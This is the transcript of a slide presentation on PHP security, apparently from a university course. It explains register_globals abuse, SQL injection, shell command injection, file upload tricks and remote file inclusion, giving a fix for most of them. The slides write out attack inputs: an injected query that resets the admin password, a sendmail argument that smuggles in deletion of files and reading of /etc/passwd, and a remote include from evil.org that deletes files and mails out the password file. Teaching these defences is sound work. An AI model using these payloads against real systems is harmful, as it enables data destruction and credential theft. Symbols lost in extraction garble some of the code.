PHP Security - PowerPoint PPT Presentation

About This Presentation
Title:

PHP Security

Description:

PHP Security CS-422 (from The Linux Journal Oct 2002 author: Nuno Lourereio) Secure Web Applications Most security issues have to do with: hacker attacks denial of ... – PowerPoint PPT presentation

Number of Views:47
Avg rating:3.0/5.0
Slides: 11
Provided by: DickSt3
Category:
Tags: php | security

less

Transcript and Presenter's Notes

Title: PHP Security


1
PHP Security
  • CS-422
  • (from The Linux Journal
  • Oct 2002
  • author Nuno Lourereio)

2
Secure Web Applications
  • Most security issues have to do with
  • hacker attacks
  • denial of service
  • server hijacking
  • common threats
  • compromise of data

3
Basic Rule
  • Never trust user input
  • Poorly or unvalidated user input constitutes the
    most severe security problem with web
    applications
  • can crash a server
  • can cause buffer overflows
  • can allow machine to be hijacked
  • allow hacker to have root access
  • Assume user input is bad until you prove its OK

4
Global Variable Scope
  • In versions of PHP earlier than 4.2.0 many
    external variables were defaulted to global
    scope, variables couldnt be trusted

lt?php if (authenticate_user())
authenticated true if
(!authenticated) die
(Authorization required) ?gt If you set
authenticated to 1 via a GET
http//example.com/admin.php?authenticated1 the
last test would pass, when it shouldnt
5
Global Variable Scope (more)
Since PHP 4.1.0 register_globals has been
deprecated GET, POST, Cookie, Server,
Environment and Session variables are no longer
in the global scope. There are several new
arrays to help developers writing
applications _GET, _POST, COOKIE, _SERVER,
_ENV, _REQUEST, _SESSION lt?php
_SESSIONauthenticated false if
(authenticate_user( )) _SESSIONauthenticated
true . If
(_SESSIONauthenticated) die
(Authorization required) ?gt
6
Database Interaction
Most PHP application use data entered from a form
to build SQL queries, this can cause a security
risk. Assume a script that edits data from some
table with a form that POSTs to the same script.
The beginning of the script checks to see if the
form was submitted then updates the user chosen
table. lt?php if (update_table_submit)
db -gt query(update table set
namename) gt ?gt If you dont validate variable
table it could be set to any table via a
GET http//examp.com/edit.php?update_table_submit
1tableuserssetpassword3Daaawhereuser3D27a
dmin2723 update users set passwordaaa where
useradmin set namename
7
Calling External Programs
Sometimes you need to call external programs
(using system( ), exec( ), popen( ), passthru( ),
or the back-tick operator), this is extreemly
dangerous if the program name or any of its
arguments are based on user input. Instead use
escapeshellarg( ) or escapeshellcmd( ) so that
users cant trick the system into executing
arbitrary commands. lt?php fp
popen(/usr/sbin/sendmail -i . to , w)
?gt The user could control to to
yield http//examp.com/send.php?toevil40evil.o
rg3C2Fpasswd3Brm2A which would result in
running the command /usr/sbin/sendmail -i
evil_at_evil.org /etc/passwd rm a solution would
be fp popen(/usr/sbin/sendmail -i .
escapeshellarg(to), w)
8
File Uploads
User uploaded file can be a problem because of
the way that PHP handles them. PHP will define a
variable in the global scope that has the same
name as the file input tag in the submitted web
form. Then it will create this file with the
uploaded file content but not check if the
filename is valid or is the uploaded file. lt?PHP
if (upload_file fn_type image/gif
fn_size lt 100000)
copy(fn,images/) unlink(fn)
?gt ltform methodPOST namefileupload
actionfupload.php enctypemultipart/form
-datagt File ltinput typesubmit
nameupload_file valueuploadgt a malicious
user could create his own file specifying the
name of some file containing sensitive
information and submit it, resulting in the
processing of the other file...
9
File Uploads (cont.)
ltform methodPOST namefileupload
actionfupload.phpgt ltinput typehidden
namefn value/var/www/html/index.phpgt ltinput
typehidden namefn_type valuetextgt ltinput
typehidden namefn_size value22gt ltinput
typesubmit nameupload_file
valueuploadgt this would move the file
/var/www/html/index.html to /images a fix would
be lt?php if (upload_file _FILESfntype
image/gif
_FILESfnsize lt 100000)

move_uploaded_file(_FILESfntmp_name,imag
es/)
?gt
10
Include Files
PHP allows you to include files in your script
via include( ), include_once( ), requires( ), and
requires_once( ). This is convenient and aids
maintainability and reuse but is dangerous.
Suppose you have a script that includes several
HTML file and displays them in the proper
layout lt?php include(layout) ?gt If someone
were to pass the layout variable through a GET
just think. http//example.com/leftframe.php?layo
ut/etc/passwd -or- http//example.c
om/leftframe.php?http//evil.org/nasty.html where
nasty.html contains lt?php passthru(rm )
passthru(mail evil_at_evil.org lt/passwd)
Write a Comment
User Comments (0)
About PowerShow.com